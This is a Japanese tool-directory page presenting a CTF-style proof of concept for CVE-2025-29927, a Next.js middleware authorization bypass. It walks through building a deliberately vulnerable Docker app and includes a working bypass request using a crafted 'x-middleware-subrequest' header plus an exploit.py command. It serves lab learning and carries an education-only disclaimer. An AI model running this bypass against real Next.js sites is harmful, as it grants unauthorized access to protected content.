Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29927 | Kitploit
ツール/GitHubGitHub/mhamzakhattak/cve-2025-29927
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-29927 - Next.js ミドルウェア認可バイパス (PoC)

これは Capture The Flag (CTF) 形式の Proof of Concept であり、Next.js ミドルウェア認可バイパス の脆弱性 (CVE-2025-29927) を対象としています。目的は、認証ミドルウェアをバイパスして /protected ルートからフラグを取得することです。


脆弱性の概要

  • CVE: CVE-2025-29927
  • タイプ: 認可バイパス
  • コンポーネント: Next.js ミドルウェア
  • 影響: 保護されたルートへの不正アクセス
  • PoC 対象ルート: /protected
  • 期待される動作: 未承認ユーザーは / にリダイレクトされる
  • 脆弱な動作: 細工されたリクエストを使用すると、リダイレクトをバイパスして保護されたコンテンツに直接アクセスできる

PoC セットアップ

1. リポジトリのクローン

root@kitploit:~
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. 脆弱なアプリのビルドと実行

root@kitploit:~
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

これにより、脆弱な Next.js アプリが http://IP:3000 で起動します


エクスプロイト

1. エクスプロイトなし

以下にアクセスしてみてください:

root@kitploit:~
curl -i http://IP:3000/protected

/ にリダイレクトされます。

root@kitploit:~
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. エクスプロイトあり

提供されている exploit.py を使用して、ミドルウェアをバイパスし、保護されたルートにアクセスします:

root@kitploit:~
python3 exploit.py -url http://IP:3000

成功すると、/protected からフラグを取得できます。


ファイル

  • Dockerfile - 脆弱な Next.js アプリケーションをビルドします
  • exploit.py - 認証をバイパスするために脆弱性を悪用します
  • pages/ - 脆弱な /protected および /login ルートが含まれています
  • middleware.js - 脆弱なミドルウェアのロジック
  • README.md - このファイル

免責事項

この PoC は教育および研究目的のみを対象としています。所有していないシステム、またはテストする明示的な許可がないシステムに対しては使用しないでください。


🏁 フラグ

脆弱性を悪用して以下にアクセスし、フラグを見つけてください:

root@kitploit:~
http://IP:3000/protected

頑張ってください! 🏴‍☠️

ツールをダウンロード